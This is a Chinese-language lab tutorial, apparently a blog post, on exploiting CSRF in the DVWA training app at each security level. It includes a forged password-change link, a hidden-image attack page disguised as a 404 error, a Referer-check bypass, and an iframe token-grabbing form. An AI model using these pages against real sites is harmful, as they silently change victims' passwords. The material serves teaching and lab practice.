新手教程-DVWA全級別教程之CSRF

系統(tǒng)環(huán)境

因?yàn)榫W(wǎng)上關(guān)于dvwa的相關(guān)資料都比較舊,所以想重新過一邊dvwa的各個(gè)類型的漏洞,順帶初步入門php代碼審計(jì)相關(guān)的知識。環(huán)境安裝可以直接參照網(wǎng)上教程新手指南:手把手教你如何搭建自己的滲透測試環(huán)境,已經(jīng)寫的非常詳細(xì),可以直接按照教程一步步安裝。

簡介

CSRF,全稱Cross-site request forgery,翻譯過來就是跨站請求偽造,是指利用受害者尚未失效的身份認(rèn)證信息(cookie、會(huì)話等),誘騙其點(diǎn)擊惡意鏈接或者訪問包含攻擊代碼的頁面,在受害人不知情的情況下以受害者的身份向(身份認(rèn)證信息所對應(yīng)的)服務(wù)器發(fā)送請求,從而完成非法操作(如轉(zhuǎn)賬、改密等)。CSRF與XSS最大的區(qū)別就在于,CSRF并沒有盜取cookie而是直接利用。在2013年發(fā)布的新版OWASP Top 10中,CSRF排名第8


CSRF

接下來就對四種級別的代碼進(jìn)行分析

Low服務(wù)器端核心代碼

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

可以看到 代碼接收密碼參數(shù)會(huì)檢查password_new,password_conf是否相同,除此以外并沒有其他條件的限制。沒任何防CSRF機(jī)制。
漏洞利用
構(gòu)造鏈接:
http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
當(dāng)受害者點(diǎn)擊了這個(gè)鏈接,他的密碼就會(huì)被改成123456,(但是這這種攻擊一看就能看出來是修改密碼的,而且受害者點(diǎn)擊了鏈接之后看到這個(gè)頁面就會(huì)知道自己的密碼被篡改了)

修改成功

另外再提一點(diǎn),CSRF是利用受害者的cookies向服務(wù)器偽造請求,所以如果之前用的是firefox瀏覽器登陸這個(gè)系統(tǒng),而現(xiàn)在用chrome瀏覽器點(diǎn)擊這個(gè)鏈接,攻擊是不會(huì)觸發(fā)的,因?yàn)閏hrome瀏覽器不能利用firefox瀏覽器的cookies,所以自動(dòng)跳轉(zhuǎn)到登陸界面。
自動(dòng)跳轉(zhuǎn)

因?yàn)楣翩溄语@而易見,所以我們需要對鏈接做一些處理,比如說使用短鏈接來隱藏url
比如說百度短鏈接
image.png

但是使用短鏈接,受害者依然可以看到密碼被修改的提示,并沒有多么高明,所以需要進(jìn)一步偽裝,可以構(gòu)造攻擊頁面誘騙受害者去訪問。
這里寫在本地寫一個(gè)攻擊頁面

<img src="[http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#](http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#)" border="0" style="display:none;"/> 
<h1>404<h1> |
<h2>file not found.<h2>

當(dāng)受害者訪問test.html時(shí),會(huì)誤認(rèn)為是自己點(diǎn)擊的是一個(gè)失效的url,但實(shí)際上已經(jīng)遭受了CSRF攻擊,密碼已經(jīng)被修改為了123456


密碼修改

Medium服務(wù)器端核心代碼

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

相關(guān)函數(shù)說明
int eregi(string pattern, string string)
檢查string中是否含有pattern(不區(qū)分大小寫),如果有返回True,反之False。
可以看到,Medium級別的代碼檢查了保留變量 HTTP_REFERER(http包頭的Referer參數(shù)的值,表示來源地址)中是否包含SERVER_NAME(http包頭的Host參數(shù),及要訪問的主機(jī)名,這里是localhost),希望通過這種機(jī)制抵御CSRF攻擊

image.png

漏洞利用
過濾規(guī)則中表明referer中必須包含主機(jī)名這里是localhost,所以我們就將攻擊頁面的命名修改為localhost.html就可以繞過了。
image.png

image.png

這里因?yàn)槲矣玫倪€是本地的機(jī)器,你可以假設(shè)第一個(gè)localhost為其他的地址例如是http://xxxx/localhost.html

High服務(wù)器端核心代碼

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,High級別的代碼加入了Anti-CSRF token機(jī)制,用戶每次訪問改密頁面時(shí),服務(wù)器會(huì)返回一個(gè)隨機(jī)的token,向服務(wù)器發(fā)起請求時(shí),需要提交token參數(shù),而服務(wù)器在收到請求時(shí),會(huì)優(yōu)先檢查token,只有token正確,才會(huì)處理客戶端的請求。
漏洞利用
要繞過High級別的反CSRF機(jī)制,關(guān)鍵是要獲取token,要利用受害者的cookie去修改密碼的頁面獲取關(guān)鍵的token。試著去構(gòu)造一個(gè)攻擊頁面,將其放置在攻擊者的服務(wù)器,引誘受害者訪問,從而完成CSRF攻擊,下面是代碼。

<script type="text/javascript">

    function attack()

  {

   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;

  document.getElementById("transfer").submit(); 

  }

</script>

 

<iframe src="http://localhost/DVWA-master/vulnerabilities/csrf" id="hack" border="0" style="display:none;">

</iframe>

 

<body onload="attack()">

  <form method="GET" id="transfer" action="http://localhost/DVWA-master/vulnerabilities/csrf">

   <input type="hidden" name="password_new" value="password">

    <input type="hidden" name="password_conf" value="password">

   <input type="hidden" name="user_token" value="">

  <input type="hidden" name="Change" value="Change">

   </form>

</body>

攻擊思路是當(dāng)受害者點(diǎn)擊進(jìn)入這個(gè)頁面,腳本會(huì)通過一個(gè)看不見框架偷偷訪問修改密碼的頁面,獲取頁面中的token,并向服務(wù)器發(fā)送改密請求,以完成CSRF攻擊。在本地環(huán)境下可以實(shí)現(xiàn)

image.png

然而理想與現(xiàn)實(shí)的差距是巨大的,這里牽扯到了跨域問題,而現(xiàn)在的瀏覽器是不允許跨域請求的。這里簡單解釋下跨域,我們的框架iframe訪問的地址是[http://hack/dvwa/vulnerabilities/csrf],位于服務(wù)器localhost上,而我們的攻擊頁面位于黑客服務(wù)器hack上,兩者的域名不同,域名B下的所有頁面都不允許主動(dòng)獲取域名A下的頁面內(nèi)容,除非域名A下的頁面主動(dòng)發(fā)送信息給域名B的頁面,所以我們的攻擊腳本是不可能取到改密界面中的user_token。
由于跨域是不能實(shí)現(xiàn)的,所以我們要將攻擊代碼注入到目標(biāo)服務(wù)器localhost中,才有可能完成攻擊。所以單純從CSRF未能突破High級別。

Impossible服務(wù)器端核心代碼

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible級別的代碼利用PDO技術(shù)防御SQL注入,至于防護(hù)CSRF,則要求用戶輸入原始密碼(簡單粗暴),攻擊者在不知道原始密碼的情況下,無論如何都無法進(jìn)行CSRF攻擊。

參考文章

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容